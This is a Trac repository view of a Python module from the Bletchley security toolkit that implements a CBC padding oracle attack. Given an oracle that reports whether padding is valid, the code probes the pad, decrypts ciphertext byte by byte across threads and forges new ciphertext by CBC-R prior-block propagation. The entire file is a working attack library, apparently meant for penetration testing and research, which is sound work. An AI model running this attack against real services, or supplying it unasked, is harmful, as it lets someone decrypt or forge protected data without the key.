source: trunk/lib/bletchley/CBC/__init__.py @ 38

Last change on this file since 38 was 38, checked in by tmorgan, 11 years ago

simplified decrypt() and interface to probe_padding()

sanity checks

File size: 13.2 KB
Line 
1'''
2Created on Jul 4, 2010
3
4Copyright (C) 2010 ELOI SANFÈLIX
5Copyright (C) 2012 Timothy D. Morgan
6@author: Eloi Sanfelix < eloi AT limited-entropy.com >
7@author: Timothy D. Morgan < tmorgan {a} vsecurity . com >
8
9 This program is free software: you can redistribute it and/or modify
10 it under the terms of the GNU Lesser General Public License, version 3,
11 as published by the Free Software Foundation.
12
13 This program is distributed in the hope that it will be useful,
14 but WITHOUT ANY WARRANTY; without even the implied warranty of
15 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
16 GNU General Public License for more details.
17
18 You should have received a copy of the GNU General Public License
19 along with this program.  If not, see <http://www.gnu.org/licenses/>.
20'''
21
22import random
23import struct
24import threading
25from .. import buffertools
26from .Exceptions import *
27
28class POA:
29    """This class implements padding oracle attacks given a ciphertext and
30    function that acts as a padding oracle.
31
32    The padding scheme is assumed to be PKCS#5/#7, also defined in RFC2040.
33    This attack was first described in:
34     "Security Flaws Induced by CBC Padding. Applications to SSL, IPSEC,
35      WTLS" by Serge Vaudenay (2002)
36
37    POA objects are not caller thread-safe.  If multiple threads need to work
38    simultaneously on the same ciphertext and oracle, create a
39    separate instance. POA objects can execute tasks internally using
40    multiple threads, however.
41
42    """
43
44    ## private
45    _thread_result = None
46    _oracle = None
47    _ciphertext = None
48    _iv = None
49
50    ## protected (reading ok, changing not ok)
51    block_size = None
52
53    ## public (r/w ok)
54    decrypted = None
55    threads = None
56    log_fh = None
57   
58    def __init__(self, oracle, block_size, ciphertext, iv=None,
59                 threads=1, decrypted='', log_file=None):
60        """Creates a new padding oracle attack (POA) object.
61
62        Arguments:
63        oracle -- A function which returns True if the given ciphertext
64         results in a correct padding upon decryption and False
65         otherwise.  This function should implement the prototype:
66           def myOracle(ciphertext, iv): ...
67         If the initialization vector (iv) is unknown is not included in
68         the ciphertext message, it can be ignored in the oracle
69         implementation (though some limitations will result from this).
70
71        block_size -- The block size of the ciphertext being attacked.
72         Is almost always 8 or 16.
73
74        ciphertext -- The ciphertext to be decrypted
75
76        iv -- The initialization vector associated with the ciphertext.
77         If none provided, it is assumed to be a block of 0's
78
79        threads -- The maximum number of parallel threads to use during
80         decryption.  If more than one thread is used, then the oracle
81         function will be called in parallel.  It should implement any
82         internal locking necessary to prevent race conditions where
83         applicable.
84
85        decrypted -- If a portion of the plaintext is already known (due
86         to a prior, partially successful decryption attempt), then this
87         may be used to restart the decryption process where it was
88         previously left off.  This argument is assumed to contain the
89         final N bytes (for an N-byte argument) of the plaintext; that
90         is, the tail of the plaintext including the pad.
91
92        log_file -- A Python file object where log messages will be
93         written.
94
95        """
96
97        if(len(ciphertext)%block_size != 0 or len(ciphertext) < block_size):
98            raise InvalidBlockError(block_size,len(ciphertext))
99        if(iv != None and len(iv)%block_size != 0):
100            raise InvalidBlockError(block_size,len(iv))
101        if len(decrypted) > len(ciphertext):
102            raise Exception #XXX: custom exception
103       
104        self.block_size = block_size
105        self.decrypted = decrypted
106        self.threads = threads
107        self.log_fh = log_file
108
109        self._oracle = oracle
110        self._ciphertext = ciphertext
111        if iv == None:
112            self._iv = '\x00'*self.block_size
113        else:
114            self._iv = iv
115
116
117    def log_message(self, s):
118        if self.log_fh != None:
119            self.log_fh.write(s+'\n')
120
121
122    def probe_padding(self):
123        """Attempts to verify that a CBC padding oracle exists and then determines the
124        pad value. 
125
126        Returns the pad string, or None on failure.
127        XXX: Currently only works for PKCS 5/7.
128        """
129
130        blocks = buffertools.splitBuffer(self._ciphertext, self.block_size)
131        final = blocks[-1]
132        if len(blocks) == 1:
133            # If only one block present, then try to use IV as prior
134            prior = self._iv
135        else:
136            prior = blocks[-2]
137
138        ret_val = None
139        # First probe for beginning of pad
140        for i in range(0-self.block_size,0):
141            if i == -1:
142                break
143            tweaked = struct.unpack("B", prior[i])[0] ^ 0xFF
144            tweaked = struct.pack("B", tweaked)
145            if not self._oracle(self._ciphertext+prior[:i]+tweaked+prior[i+1:]+final, self._iv):
146                break
147
148        pad_length = 0-i
149        self.log_message("Testing suspected pad length: %d" % pad_length)
150        if pad_length > 1:
151            # Verify suspected pad length by changing last pad byte to 1
152            # and making sure the padding succeeds
153            tweaked = struct.unpack("B", prior[-1])[0] ^ (pad_length^1)
154            tweaked = struct.pack("B", tweaked)
155            if self._oracle(self._ciphertext+prior[:-1]+tweaked+final, self._iv):
156                ret_val = buffertools.pkcs7Pad(pad_length)
157
158        else:
159            # Verify by changing pad byte to 2 and brute-force changing
160            # second-to-last byte to 2 as well
161            tweaked = struct.unpack("B", prior[-1])[0] ^ (2^1)
162            tweaked = struct.pack("B", tweaked)
163            for j in range(1,256):
164                guess = struct.unpack("B", prior[-2])[0] ^ j
165                guess = struct.pack("B", guess)
166                if self._oracle(self._ciphertext+prior[:-2]+guess+tweaked+final, self._iv):
167                    # XXX: Save the decrypted byte for later
168                    ret_val = buffertools.pkcs7Pad(pad_length)
169
170        return ret_val
171
172
173    # XXX: This could be generalized as a byte probe utility for a variety of attacks
174    def _test_value_set(self, prefix, suffix, value_set):
175        for b in value_set:
176            if self._thread_result != None:
177                # Stop if another thread found the result
178                break
179            if self._oracle(str(prefix+struct.pack("B",b)+suffix), self._iv):
180                self._thread_result = b
181                break
182
183
184    def decrypt_next_byte(self, prior, block, known_bytes):
185        """Decrypts one byte of ciphertext by modifying the prior
186        ciphertext block at the same relative offset.
187
188        Arguments:
189        prior -- Ciphertext block appearing prior to the current target
190        block -- Currently targeted ciphertext block
191        known_bytes -- Bytes in this block already decrypted
192
193        """
194
195        if(len(block)!=self.block_size):
196            raise InvalidBlockError
197        numKnownBytes = len(known_bytes)
198       
199        if(numKnownBytes >= self.block_size):
200            return known_bytes
201       
202        prior_prefix = prior[0:self.block_size-numKnownBytes-1]
203        base = ord(prior[self.block_size-numKnownBytes-1])
204        # Adjust known bytes to appear as a PKCS 7 pad
205        suffix = [0]*numKnownBytes
206        for i in range(0,numKnownBytes):
207            suffix[i] ^= ord(prior[0-numKnownBytes+i])^ord(known_bytes[i])^(numKnownBytes+1)
208        suffix = struct.pack("B"*len(suffix),*suffix)+block
209
210        # Each thread spawned searches a subset of the next byte's
211        # 256 possible values
212        self._thread_result = None
213        threads = []
214        for i in range(0,self.threads):
215            t = threading.Thread(target=self._test_value_set, 
216                                 args=(self._ciphertext+prior_prefix, suffix, range(i,256,self.threads)))
217            t.start()
218            threads.append(t)
219           
220        for t in threads:
221            t.join()
222       
223        if self._thread_result == None:
224            self.log_message("Value of a byte could not be determined.  Current plaintext suffix: "+ repr(self.decrypted))
225            raise Exception #XXX: custom exception
226
227        decrypted = struct.pack("B",self._thread_result^base^(numKnownBytes+1))
228        self.decrypted = decrypted + self.decrypted
229        #  Return previous bytes together with current byte
230        return decrypted+known_bytes
231   
232
233    def decrypt_block(self, prior, block, last_bytes=''):
234        """Decrypts the block of ciphertext provided as a parameter.
235
236        """
237
238        while(len(last_bytes)!=self.block_size):
239            last_bytes = self.decrypt_next_byte(prior, block, last_bytes)
240
241        self.log_message("Decrypted block: %s" % repr(last_bytes))
242        return last_bytes
243
244
245    def decrypt(self):
246        """Decrypts the previously supplied ciphertext. If the IV was
247        not provided, it assumes a IV of zero bytes.
248
249        """
250
251        if len(self.decrypted) == 0:
252            # First decrypt the padding (quick to decrypt and good sanity check)
253            pad_bytes = self.probe_padding()
254            if pad_bytes == None:
255                # XXX: custom exception
256                raise Exception
257           
258            self.decrypted = pad_bytes
259
260
261        # Start where we left off last, whether that be with just a pad,
262        # or with additional decrypted blocks.
263
264        # number of bytes in any partially decrypted blocks
265        num_partial = len(self.decrypted) % self.block_size
266
267        # number of blocks fully decrypted
268        finished_blocks = len(self.decrypted) / self.block_size
269
270        # contents of the partial block
271        partial = self.decrypted[0:num_partial]
272
273        # contents of fully decrypted blocks
274        decrypted = self.decrypted[num_partial:]
275       
276        blocks = buffertools.splitBuffer(self._ciphertext, self.block_size)
277
278        # Start with the partially decrypted block at the end, and work
279        # our way to the front.  Don't decrypt the very first block of
280        # the ciphertext yet.
281        for i in range(len(blocks)-1-finished_blocks, 0, -1):
282            decrypted = self.decrypt_block(blocks[i-1], blocks[i], partial) + decrypted
283            partial = ''
284               
285        # Finally decrypt first block
286        decrypted = self.decrypt_block(self._iv, blocks[0], partial) + decrypted
287       
288        # Remove the padding and return
289        return buffertools.stripPKCS7Pad(decrypted, self.block_size, self.log_fh)
290
291
292    def encrypt_block(self, plaintext, ciphertext):
293        """Encrypts a block of plaintext.  This is accomplished by
294        decrypting the supplied ciphertext and then computing the prior
295        block needed to create the desired plaintext at the ciphertext's
296        location.
297
298        Returns the calculated prior block and the provided ciphertext
299        block as a tuple.
300
301        """
302        if len(plaintext) != self.block_size or len(plaintext) != len(ciphertext):
303            raise InvalidBlockError(self.block_size,len(plaintext))
304
305        ptext = self.decrypt_block('\x00'*self.block_size, ciphertext)
306        prior = buffertools.xorBuffers(ptext, plaintext)
307        return prior,ciphertext
308   
309   
310    def encrypt(self,plaintext):
311        """Encrypts a plaintext value through "CBC-R" style prior-block
312        propagation.
313       
314        Returns a tuple of the IV and ciphertext. 
315
316        NOTE: If your target messages do not include an IV with the
317        ciphertext, you can instead opt to encrypt a suffix of the
318        message and include the IV in the the middle of the ciphertext as
319        if it were an encrypted block. This one block alone will decrypt
320        to an uncontrollable random value, but with careful placement,
321        this might be ok.
322
323        """
324
325        blocks = buffertools.splitBuffer(buffertools.pkcs7PadBuffer(plaintext, self.block_size), 
326                                         self.block_size)
327
328        if (len(self.decrypted) >= self.block_size
329            and len(self._ciphertext) >= 2*self.block_size):
330            # If possible, reuse work from prior decryption efforts on original
331            # message for last block
332            old_prior = self._ciphertext[0-self.block_size*2:0-self.block_size]
333            final_plaintext = self.decrypted[0-self.block_size:]
334            prior = buffertools.xorBuffers(old_prior,
335                                           buffertools.xorBuffers(final_plaintext, blocks[-1]))
336            ciphertext = self._ciphertext[0-self.block_size:]
337        else:
338            # Otherwise, select a random last block and generate the prior block
339            ciphertext = struct.pack("B"*self.block_size, 
340                                     *[random.getrandbits(8) for i in range(self.block_size)])
341            prior,ciphertext = self.encrypt_block(blocks[-1], ciphertext)
342
343        # Continue generating all prior blocks
344        for i in range(len(blocks)-2, -1, -1):
345            prior,cblock = self.encrypt_block(blocks[i],prior)
346            ciphertext = cblock+ciphertext
347       
348        # prior as IV
349        return str(prior),str(ciphertext)
Note: See TracBrowser for help on using the repository browser.